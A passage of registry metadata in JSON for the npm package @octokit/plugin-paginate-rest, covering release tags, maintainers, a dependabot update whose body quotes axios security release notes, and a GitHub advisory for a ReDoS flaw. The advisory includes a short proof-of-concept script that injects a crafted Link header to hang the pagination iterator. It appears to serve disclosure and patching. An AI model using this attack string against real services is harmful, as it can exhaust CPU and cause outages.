/octokit/plugin-paginate-rest.js/tar.gz/v2.0.1","html_url":"https://github.com/octokit/plugin-paginate-rest.js/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/octokit%2Fplugin-paginate-rest.js/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/octokit%2Fplugin-paginate-rest.js/tags/v2.0.1/manifests"},{"name":"v1.1.2","sha":"1fc9cd0490a06a2249bd0ef83234e92d9338d287","kind":"commit","published_at":"2020-02-02T01:02:11.000Z","download_url":"https://codeload.github.com/octokit/plugin-paginate-rest.js/tar.gz/v1.1.2","html_url":"https://github.com/octokit/plugin-paginate-rest.js/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/octokit%2Fplugin-paginate-rest.js/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/octokit%2Fplugin-paginate-rest.js/tags/v1.1.2/manifests"},{"name":"v2.0.0","sha":"ffe874fba2fc9ceff2d13b9f08a559b345cad7fd","kind":"commit","published_at":"2020-02-01T04:09:49.000Z","download_url":"https://codeload.github.com/octokit/plugin-paginate-rest.js/tar.gz/v2.0.0","html_url":"https://github.com/octokit/plugin-paginate-rest.js/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/octokit%2Fplugin-paginate-rest.js/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/octokit%2Fplugin-paginate-rest.js/tags/v2.0.0/manifests"},{"name":"v1.1.1","sha":"957370f5617e4fe72d117be2256f93a26f214938","kind":"commit","published_at":"2020-01-26T23:11:50.000Z","download_url":"https://codeload.github.com/octokit/plugin-paginate-rest.js/tar.gz/v1.1.1","html_url":"https://github.com/octokit/plugin-paginate-rest.js/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/octokit%2Fplugin-paginate-rest.js/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/octokit%2Fplugin-paginate-rest.js/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e7cc38d630b7e6484c9955ddeb786d0a0b40afab","kind":"commit","published_at":"2020-01-26T22:40:11.000Z","download_url":"https://codeload.github.com/octokit/plugin-paginate-rest.js/tar.gz/v1.1.0","html_url":"https://github.com/octokit/plugin-paginate-rest.js/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/octokit%2Fplugin-paginate-rest.js/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/octokit%2Fplugin-paginate-rest.js/tags/v1.1.0/manifests"},{"name":"v1.0.2","sha":"280a2b7998c06714017175d18940eb99a60963d7","kind":"commit","published_at":"2019-11-25T19:47:52.000Z","download_url":"https://codeload.github.com/octokit/plugin-paginate-rest.js/tar.gz/v1.0.2","html_url":"https://github.com/octokit/plugin-paginate-rest.js/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/octokit%2Fplugin-paginate-rest.js/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/octokit%2Fplugin-paginate-rest.js/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"229d2d423ec43a20a01875f02248d61be5b24b93","kind":"commit","published_at":"2019-11-19T22:21:28.000Z","download_url":"https://codeload.github.com/octokit/plugin-paginate-rest.js/tar.gz/v1.0.1","html_url":"https://github.com/octokit/plugin-paginate-rest.js/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/octokit%2Fplugin-paginate-rest.js/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/octokit%2Fplugin-paginate-rest.js/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"19b54b3930ea81b91f69d522889e82f1179d8913","kind":"commit","published_at":"2019-11-03T17:07:36.000Z","download_url":"https://codeload.github.com/octokit/plugin-paginate-rest.js/tar.gz/v1.0.0","html_url":"https://github.com/octokit/plugin-paginate-rest.js/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/octokit%2Fplugin-paginate-rest.js/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/octokit%2Fplugin-paginate-rest.js/tags/v1.0.0/manifests"}]},"repo_metadata_updated_at":"2023-12-14T01:29:18.026Z","dependent_packages_count":78,"downloads":53406966,"downloads_period":"last-month","dependent_repos_count":162625,"rankings":{"downloads":0.045642184439875666,"dependent_repos_count":0.08120858971126048,"dependent_packages_count":0.42559215052995036,"stargazers_count":6.414301254297607,"forks_count":5.062750474150287,"docker_downloads_count":0.22577411691134655,"average":2.0425447950067213},"purl":"pkg:npm/%40octokit/plugin-paginate-rest","advisories":[{"uuid":"GSA_kwCzR0hTQS1oNWMzLTVyM3ItcnI4cc4ABEfq","url":"https://github.com/advisories/GHSA-h5c3-5r3r-rr8q","title":"@octokit/plugin-paginate-rest has a Regular Expression in iterator Leads to ReDoS Vulnerability Due to Catastrophic Backtracking","description":"### Summary\nFor the npm package `@octokit/plugin-paginate-rest`, when calling `octokit.paginate.iterator()`, a specially crafted `octokit` instance—particularly with a malicious `link` parameter in the `headers` section of the `request`—can trigger a ReDoS attack.\n\n### Details\nThe issue occurs at [line 39](https://github.com/octokit/plugin-paginate-rest.js/blob/main/src/iterator.ts) of iterator.ts in the @octokit/plugin-paginate-rest repository. The relevant code is as follows:\n```js\nurl = ((normalizedResponse.headers.link || \"\").match(\n  /\u003c([^\u003e]+)\u003e;\\s*rel=\"next\"/,\n) || [])[1];\n```\nThe regular expression `/\u003c([^\u003e]+)\u003e;\\s*rel=\"next\"/` may lead to a potential backtracking vulnerability, resulting in a ReDoS (Regular Expression Denial of Service) attack. This could cause high CPU utilization and even service slowdowns or freezes when processing specially crafted `Link` headers.\n\n### PoC\n[The gist of PoC.js](https://gist.github.com/ShiyuBanzhou/d3f2ad000be8384d2105c87c2ed7ce7d)\n1. run npm i @octokit/plugin-paginate-rest\n2. run 'node poc.js'\nresult:\n3. then the program will stuck forever with high CPU usage\n```js\nimport { Octokit } from \"@octokit/core\";\nimport { paginateRest } from \"@octokit/plugin-paginate-rest\";\n\nconst MyOctokit = Octokit.plugin(paginateRest);\nconst octokit = new MyOctokit({\n  auth: \"your-github-token\",\n});\n\n// Intercept the request to inject a malicious 'link' header for ReDoS\noctokit.hook.wrap(\"request\", async (request, options) =\u003e {\n  const maliciousLinkHeader = \"\" + \"\u003c\".repeat(100000) + \"\u003e\"; // attack string\n  return {\n    data: [],\n    headers: {\n      link: maliciousLinkHeader, // Inject malicious 'link' header\n    },\n  };\n});\n\n// Trigger the ReDoS attack by paginating through GitHub issues\n(async () =\u003e {\n  try {\n    for await (const normalizedResponse of octokit.paginate.iterator(\n      \"GET /repos/{owner}/{repo}/issues\", { owner: \"DayShift\", repo: \"ReDos\", per_page: 100 }\n    )) {\n      console.log({ normalizedResponse });\n    }\n  } catch (error) {\n    console.error(\"Error encountered:\", error);\n  }\n})();\n```\n![image](https://github.com/user-attachments/assets/619c030e-5473-4a26-9e2a-4b9a26c1563b)\n\n### Impact\n#### What kind of vulnerability is it?\nThis is a *Regular Expression Denial of Service (ReDoS) vulnerability*, which occurs due to excessive backtracking in the regex pattern:\n```js\n/\u003c([^\u003e]+)\u003e;\\s*rel=\"next\"/\n```\nWhen processing a specially crafted `Link` header, this regex can cause significant performance degradation, leading to high CPU utilization and potential service unresponsiveness.\n#### Who is impacted?\n* Users of `@octokit/plugin-paginate-rest` who call `octokit.paginate.iterator()` and process untrusted or manipulated `Link` headers.\n* Applications relying on Octokit's pagination mechanism, particularly those handling large volumes of API requests.\n* GitHub API consumers who integrate this package into their projects for paginated data retrieval.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-02-14T17:57:59.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","references":["https://github.com/octokit/plugin-paginate-rest.js/security/advisories/GHSA-h5c3-5r3r-rr8q","https://github.com/octokit/plugin-paginate-rest.js/commit/bb6c4f945d8023902cf387391d2b2209261044ab","https://nvd.nist.gov/vuln/detail/CVE-2025-25288","https://github.com/octokit/plugin-paginate-rest.js/blob/main/src/iterator.ts","https://github.com/octokit/plugin-paginate-rest.js/releases/tag/v9.2.2","https://github.com/advisories/GHSA-h5c3-5r3r-rr8q"],"source_kind":"github","identifiers":["GHSA-h5c3-5r3r-rr8q","CVE-2025-25288"],"repository_url":"https://github.com/octokit/plugin-paginate-rest.js","blast_radius":27.619292740719104,"packages":[{"versions":[{"first_patched_version":"9.2.2","vulnerable_version_range":"\u003e= 1.0.0, \u003c 9.2.2"},{"first_patched_version":"11.4.1","vulnerable_version_range":"\u003e= 9.3.0-beta.1, \u003c 11.4.1"}],"ecosystem":"npm","package_name":"@octokit/plugin-paginate-rest"}],"created_at":"2025-02-14T18:07:42.446Z","updated_at":"2025-02-18T19:15:06.000Z","epss_percentage":0.00045,"epss_percentile":0.1796}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@octokit/plugin-paginate-rest","docker_dependents_count":1310,"docker_downloads_count":115133152,"usage_url":"https://repos.ecosyste.ms/usage/npm/@octokit/plugin-paginate-rest","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@octokit/plugin-paginate-rest/dependencies","status":null,"funding_links":[],"critical":true,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@octokit%2Fplugin-paginate-rest/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@octokit%2Fplugin-paginate-rest/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@octokit%2Fplugin-paginate-rest/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@octokit%2Fplugin-paginate-rest/related_packages","maintainers":[{"uuid":"kfcampbell","login":"kfcampbell","name":null,"email":"kfcampbell@github.com","url":null,"packages_count":24,"html_url":"https://www.npmjs.com/~kfcampbell","role":null,"created_at":"2022-11-08T07:03:07.224Z","updated_at":"2022-11-08T07:03:07.224Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/kfcampbell/packages"},{"uuid":"nickfloyd","login":"nickfloyd","name":null,"email":"nicholas.floyd.info@gmail.com","url":null,"packages_count":24,"html_url":"https://www.npmjs.com/~nickfloyd","role":null,"created_at":"2022-11-08T07:03:07.273Z","updated_at":"2022-11-08T07:03:07.273Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nickfloyd/packages"},{"uuid":"gr2m","login":"gr2m","name":null,"email":"gregor@martynus.net","url":null,"packages_count":339,"html_url":"https://www.npmjs.com/~gr2m","role":null,"created_at":"2022-11-08T07:03:07.301Z","updated_at":"2022-11-08T07:03:07.301Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/gr2m/packages"},{"uuid":"octokitbot","login":"octokitbot","name":null,"email":"security+octokitbot@github.com","url":null,"packages_count":91,"html_url":"https://www.npmjs.com/~octokitbot","role":null,"created_at":"2022-11-08T07:03:07.364Z","updated_at":"2022-11-08T07:03:07.364Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/octokitbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5006539,"maintainers_count":1012933,"namespaces_count":295512,"keywords_count":700181,"github":"npm","metadata":{"funded_packages_count":150239},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-06-06T05:58:05.971Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},"unique_repositories_count":669,"unique_repositories_count_past_30_days":4,"recent_issues":[{"uuid":"4506998168","node_id":"PR_kwDOIkp-Fs7ekAXp","number":2000,"state":"open","title":"build(deps): bump the npm_and_yarn group across 4 directories with 7 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-23T05:42:19.000Z","updated_at":"2026-05-23T05:42:56.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"npm_and_yarn","update_count":7,"packages":[{"name":"axios","old_version":"1.14.0","new_version":"1.15.2","repository_url":"https://github.com/axios/axios"},{"name":"next","old_version":"16.2.2","new_version":"16.2.6","repository_url":"https://github.com/vercel/next.js"},{"name":"follow-redirects","old_version":"1.15.11","new_version":"1.16.0","repository_url":"https://github.com/follow-redirects/follow-redirects"},{"name":"ws","old_version":"8.20.0","new_version":"8.21.0","repository_url":"https://github.com/websockets/ws"},{"name":"@octokit/plugin-paginate-rest","old_version":"2.21.3","new_version":"14.0.0","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@octokit/request","old_version":"5.6.3","new_version":"10.0.9"},{"name":"@octokit/request-error","old_version":"2.1.0","new_version":"7.1.0"},{"name":"next","old_version":"16.2.4","new_version":"16.2.6","repository_url":"https://github.com/vercel/next.js"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 3 updates in the /software-review-platform/frontend directory: [axios](https://github.com/axios/axios), [next](https://github.com/vercel/next.js) and [follow-redirects](https://github.com/follow-redirects/follow-redirects).\nBumps the npm_and_yarn group with 1 update in the /software-review-platform/backend directory: [ws](https://github.com/websockets/ws).\nBumps the npm_and_yarn group with 1 update in the / directory: [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js).\nBumps the npm_and_yarn group with 1 update in the /frontend directory: [next](https://github.com/vercel/next.js).\n\nUpdates `axios` from 1.14.0 to 1.15.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.15.2\u003c/h2\u003e\n\u003cp\u003eThis release delivers prototype-pollution hardening for the Node HTTP adapter, adds an opt-in \u003ccode\u003eallowedSocketPaths\u003c/code\u003e allowlist to mitigate SSRF via Unix domain sockets, fixes a keep-alive socket memory leak, and ships supply-chain hardening across CI and security docs.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution Hardening (HTTP Adapter):\u003c/strong\u003e Hardened the Node HTTP adapter and \u003ccode\u003eresolveConfig\u003c/code\u003e/\u003ccode\u003emergeConfig\u003c/code\u003e/validator paths to read only own properties and use null-prototype config objects, preventing polluted \u003ccode\u003eauth\u003c/code\u003e, \u003ccode\u003ebaseURL\u003c/code\u003e, \u003ccode\u003esocketPath\u003c/code\u003e, \u003ccode\u003ebeforeRedirect\u003c/code\u003e, and \u003ccode\u003einsecureHTTPParser\u003c/code\u003e from influencing requests. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10779\"\u003e#10779\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSSRF via \u003ccode\u003esocketPath\u003c/code\u003e:\u003c/strong\u003e Rejects non-string \u003ccode\u003esocketPath\u003c/code\u003e values and adds an opt-in \u003ccode\u003eallowedSocketPaths\u003c/code\u003e config option to restrict permitted Unix domain socket paths, returning \u003ccode\u003eAxiosError\u003c/code\u003e \u003ccode\u003eERR_BAD_OPTION_VALUE\u003c/code\u003e on mismatch. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10777\"\u003e#10777\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSupply-chain Hardening:\u003c/strong\u003e Added \u003ccode\u003e.npmrc\u003c/code\u003e with \u003ccode\u003eignore-scripts=true\u003c/code\u003e, lockfile lint CI, non-blocking reproducible build diff, scoped CODEOWNERS, expanded \u003ccode\u003eSECURITY.md\u003c/code\u003e/\u003ccode\u003eTHREATMODEL.md\u003c/code\u003e with provenance verification (\u003ccode\u003enpm audit signatures\u003c/code\u003e), 60-day resolution policy, and maintainer incident-response runbook. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10776\"\u003e#10776\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eallowedSocketPaths\u003c/code\u003e Config Option:\u003c/strong\u003e New request config option (and TypeScript types) to allowlist Unix domain socket paths used by the Node http adapter; backwards compatible when unset. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10777\"\u003e#10777\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eKeep-alive Socket Memory Leak:\u003c/strong\u003e Installs a single per-socket \u003ccode\u003eerror\u003c/code\u003e listener tracking the active request via \u003ccode\u003ekAxiosSocketListener\u003c/code\u003e/\u003ccode\u003ekAxiosCurrentReq\u003c/code\u003e, eliminating per-request listener accumulation, \u003ccode\u003eMaxListenersExceededWarning\u003c/code\u003e, and linear heap growth under concurrent or long-running keep-alive workloads (fixes \u003ca href=\"https://redirect.github.com/axios/axios/issues/10780\"\u003e#10780\u003c/a\u003e). (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10788\"\u003e#10788\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eChangelog:\u003c/strong\u003e Updated \u003ccode\u003eCHANGELOG.md\u003c/code\u003e with v1.15.1 release notes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10781\"\u003e#10781\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v1.15.1...v1.15.2\"\u003eFull Changelog\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.15.1\u003c/h2\u003e\n\u003cp\u003eThis release ships a coordinated set of security hardening fixes across headers, body/redirect limits, multipart handling, and XSRF/prototype-pollution vectors, alongside a broad sweep of bug fixes, test migrations, and threat-model documentation updates.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eHeader Injection Hardening:\u003c/strong\u003e Tightened validation and sanitisation across request header construction to close the header-injection attack surface. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10749\"\u003e#10749\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCRLF Stripping in Multipart Headers:\u003c/strong\u003e Correctly strips CR/LF from multipart header values to prevent injection via field names and filenames. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10758\"\u003e#10758\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution / Auth Bypass:\u003c/strong\u003e Replaced unsafe \u003ccode\u003ein\u003c/code\u003e checks with \u003ccode\u003ehasOwnProperty\u003c/code\u003e to prevent authentication bypass via prototype pollution on config objects, with additional regression tests. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10761\"\u003e#10761\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10760\"\u003e#10760\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ewithXSRFToken\u003c/code\u003e Truthy Bypass:\u003c/strong\u003e Short-circuits on any truthy non-boolean value, so an ambiguous config no longer silently leaks the XSRF token cross-origin. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10762\"\u003e#10762\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003emaxBodyLength\u003c/code\u003e With Zero Redirects:\u003c/strong\u003e Enforces \u003ccode\u003emaxBodyLength\u003c/code\u003e even when \u003ccode\u003emaxRedirects\u003c/code\u003e is set to \u003ccode\u003e0\u003c/code\u003e, closing a bypass path for oversized request bodies. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10753\"\u003e#10753\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eStreamed Response \u003ccode\u003emaxContentLength\u003c/code\u003e Bypass:\u003c/strong\u003e Applies \u003ccode\u003emaxContentLength\u003c/code\u003e to streamed responses that previously bypassed the cap. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10754\"\u003e#10754\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFollow-up CVE Completion:\u003c/strong\u003e Completes an earlier incomplete CVE fix to fully close the regression window. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10755\"\u003e#10755\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eAI-Based Docs Translations:\u003c/strong\u003e Initial scaffold for AI-assisted translations of the documentation site. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10705\"\u003e#10705\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eLocation\u003c/code\u003e Request Header Type:\u003c/strong\u003e Adds \u003ccode\u003eLocation\u003c/code\u003e to \u003ccode\u003eCommonRequestHeadersList\u003c/code\u003e for accurate typing of redirect-aware requests. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7528\"\u003e#7528\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFormData Handling:\u003c/strong\u003e Removes \u003ccode\u003eContent-Type\u003c/code\u003e when no boundary is present on \u003ccode\u003eFormData\u003c/code\u003e fetch requests, supports multi-select fields, cancels \u003ccode\u003erequest.body\u003c/code\u003e instead of the source stream on fetch abort, and fixes a recursion bug in form-data serialisation. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7314\"\u003e#7314\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10676\"\u003e#10676\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10702\"\u003e#10702\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10726\"\u003e#10726\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHTTP Adapter:\u003c/strong\u003e Handles socket-only request errors without leaking keep-alive listeners. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10576\"\u003e#10576\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eProgress Events:\u003c/strong\u003e Clamps \u003ccode\u003eloaded\u003c/code\u003e to \u003ccode\u003etotal\u003c/code\u003e for computable upload/download progress events. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7458\"\u003e#7458\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eTypes:\u003c/strong\u003e Aligns \u003ccode\u003erunWhen\u003c/code\u003e type with the runtime behaviour in \u003ccode\u003eInterceptorManager\u003c/code\u003e and makes response header keys case-insensitive. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7529\"\u003e#7529\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10677\"\u003e#10677\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ebuildFullPath\u003c/code\u003e:\u003c/strong\u003e Uses strict equality in the base/relative URL check. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7252\"\u003e#7252\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eAxiosURLSearchParams\u003c/code\u003e Regex:\u003c/strong\u003e Improves the regex used for param serialisation to avoid edge-case mismatches. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10736\"\u003e#10736\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eResilient Value Parsing:\u003c/strong\u003e Parses out header/config values instead of throwing on malformed input. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10687\"\u003e#10687\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/blob/v1.x/CHANGELOG.md\"\u003eaxios's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.15.2 - April 21, 2026\u003c/h2\u003e\n\u003cp\u003eThis release delivers prototype-pollution hardening for the Node HTTP adapter, adds an opt-in \u003ccode\u003eallowedSocketPaths\u003c/code\u003e allowlist to mitigate SSRF via Unix domain sockets, fixes a keep-alive socket memory leak, and ships supply-chain hardening across CI and security docs.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution Hardening (HTTP Adapter):\u003c/strong\u003e Hardened the Node HTTP adapter and \u003ccode\u003eresolveConfig\u003c/code\u003e/\u003ccode\u003emergeConfig\u003c/code\u003e/validator paths to read only own properties and use null-prototype config objects, preventing polluted \u003ccode\u003eauth\u003c/code\u003e, \u003ccode\u003ebaseURL\u003c/code\u003e, \u003ccode\u003esocketPath\u003c/code\u003e, \u003ccode\u003ebeforeRedirect\u003c/code\u003e, and \u003ccode\u003einsecureHTTPParser\u003c/code\u003e from influencing requests. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10779\"\u003e#10779\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSSRF via \u003ccode\u003esocketPath\u003c/code\u003e:\u003c/strong\u003e Rejects non-string \u003ccode\u003esocketPath\u003c/code\u003e values and adds an opt-in \u003ccode\u003eallowedSocketPaths\u003c/code\u003e config option to restrict permitted Unix domain socket paths, returning \u003ccode\u003eAxiosError\u003c/code\u003e \u003ccode\u003eERR_BAD_OPTION_VALUE\u003c/code\u003e on mismatch. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10777\"\u003e#10777\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSupply-chain Hardening:\u003c/strong\u003e Added \u003ccode\u003e.npmrc\u003c/code\u003e with \u003ccode\u003eignore-scripts=true\u003c/code\u003e, lockfile lint CI, non-blocking reproducible build diff, scoped CODEOWNERS, expanded \u003ccode\u003eSECURITY.md\u003c/code\u003e/\u003ccode\u003eTHREATMODEL.md\u003c/code\u003e with provenance verification (\u003ccode\u003enpm audit signatures\u003c/code\u003e), 60-day resolution policy, and maintainer incident-response runbook. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10776\"\u003e#10776\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New 